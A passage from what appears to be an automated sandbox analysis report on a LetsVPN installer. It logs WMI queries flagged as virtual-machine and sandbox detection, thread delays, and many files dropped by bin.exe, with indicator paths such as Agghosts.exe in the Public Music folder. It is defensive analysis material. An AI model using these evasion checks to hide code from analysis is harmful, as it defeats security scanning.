                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_DiskDrive
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_DiskDrive
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_DiskDrive
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_DiskDrive
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where ServiceName=&quot;tap0901&quot;
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where GUID=&quot;{508118AE-7AB1-45A3-BF63-B6BD771A1493}&quot;
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select MACAddress From Win32_NetworkAdapter WHERE ((MACAddress Is Not NULL) AND (Manufacturer &lt;&gt; &apos;Microsoft&apos;))
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::PutInstance - root\cimv2 : Win32_NetworkAdapter.DeviceID=&quot;10&quot;
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where ServiceName=&quot;tap0901&quot;
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapterConfiguration where SettingID=&quot;{508118AE-7AB1-45A3-BF63-B6BD771A1493}&quot;
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_NetworkAdapterConfiguration.Index=10::EnableStatic
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_networkadapterconfiguration where ServiceName = &apos;tap0901&apos;
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_NetworkAdapterConfiguration.Index=10::EnableStatic
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where ServiceName=&quot;tap0901&quot;
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where GUID=&quot;{508118AE-7AB1-45A3-BF63-B6BD771A1493}&quot;
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::PutInstance - root\cimv2 : Win32_NetworkAdapter.DeviceID=&quot;10&quot;
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where ServiceName=&quot;tap0901&quot;
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapterConfiguration where SettingID=&quot;{508118AE-7AB1-45A3-BF63-B6BD771A1493}&quot;
                Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = &apos;C:&apos;
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID=&quot;C:&quot;} where resultclass = Win32_DiskPartition
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent=&quot;Win32_LogicalDisk.DeviceID=\&quot;C:\&quot;&quot;
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = &apos;C:&apos;
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID=&quot;C:&quot;} where resultclass = Win32_DiskPartition
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent=&quot;Win32_LogicalDisk.DeviceID=\&quot;C:\&quot;&quot;
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = &apos;C:&apos;
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID=&quot;C:&quot;} where resultclass = Win32_DiskPartition
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent=&quot;Win32_LogicalDisk.DeviceID=\&quot;C:\&quot;&quot;
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = &apos;C:&apos;
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID=&quot;C:&quot;} where resultclass = Win32_DiskPartition
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent=&quot;Win32_LogicalDisk.DeviceID=\&quot;C:\&quot;&quot;
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeMemory allocated: 16D0000 memory reserve | memory write watch
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeMemory allocated: 33B0000 memory reserve | memory write watch
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeMemory allocated: 53B0000 memory reserve | memory write watch
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeMemory allocated: 1480000 memory reserve | memory write watch
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeMemory allocated: 2F10000 memory reserve | memory write watch
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeMemory allocated: 4F10000 memory reserve | memory write watch
                Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: GetProcessHeap,HeapAlloc,HeapAlloc,GetAdaptersInfo,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,MultiByteToWideChar,MultiByteToWideChar,StrStrIA,StrStrIA,GetProcessHeap,HeapFree,RegCloseKey,RegEnumKeyExW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,RegCloseKey,9_2_006678A6
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: GetAdaptersInfo,GetAdaptersInfo,9_2_006677AC
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeThread delayed: delay time: 922337203685477
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeThread delayed: delay time: 922337203685477
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeThread delayed: delay time: 922337203685477
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeThread delayed: delay time: 220145
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeThread delayed: delay time: 300000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3694Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2176Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8260
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1542
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWindow / User API: threadDelayed 4470
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWindow / User API: threadDelayed 1170
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWindow / User API: threadDelayed 2893
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.Cng.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.Tracing.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Win32.SystemEvents.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\ndp462-web.exeJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Xml.XDocument.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Globalization.Calendars.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Linq.Parallel.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.Pkcs.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.Algorithms.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Claims.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Web.Services.Description.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.Thread.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.WebHeaderCollection.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Expression.Interactions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Mono.Cecil.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.Http.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.TextWriterTraceListener.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.WebSockets.Client.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ComponentModel.EventBasedAsync.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\FontAwesome.WPF.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Windows.Interactivity.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Data.OleDb.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Web.WebView2.WinForms.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\SVGImage.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ServiceModel.Http.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Mono.Cecil.Rocks.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Collections.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\runtimes\win-x64\native\e_sqlite3.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Win32.Registry.AccessControl.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.Packaging.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Mono.Cecil.Mdb.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ServiceProcess.ServiceController.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.FileVersionInfo.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.FileSystem.Watcher.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj49F4.tmp\System.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Mono.Cecil.Pdb.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\Update.exeJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\SuperSocket.ClientEngine.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Collections.Concurrent.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.IPNetwork.dllJump to dropped file
                Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\DriverStore\Temp\{e1a4fd9a-c078-804d-adb0-e99915b985de}\tap0901.sys (copy)Jump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.Security.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ServiceModel.Security.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\PusherClient.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLiteNetExtensionsAsync.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Globalization.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\WpfAnimatedGif.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.Requests.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.FileSystem.AccessControl.dllJump to dropped file
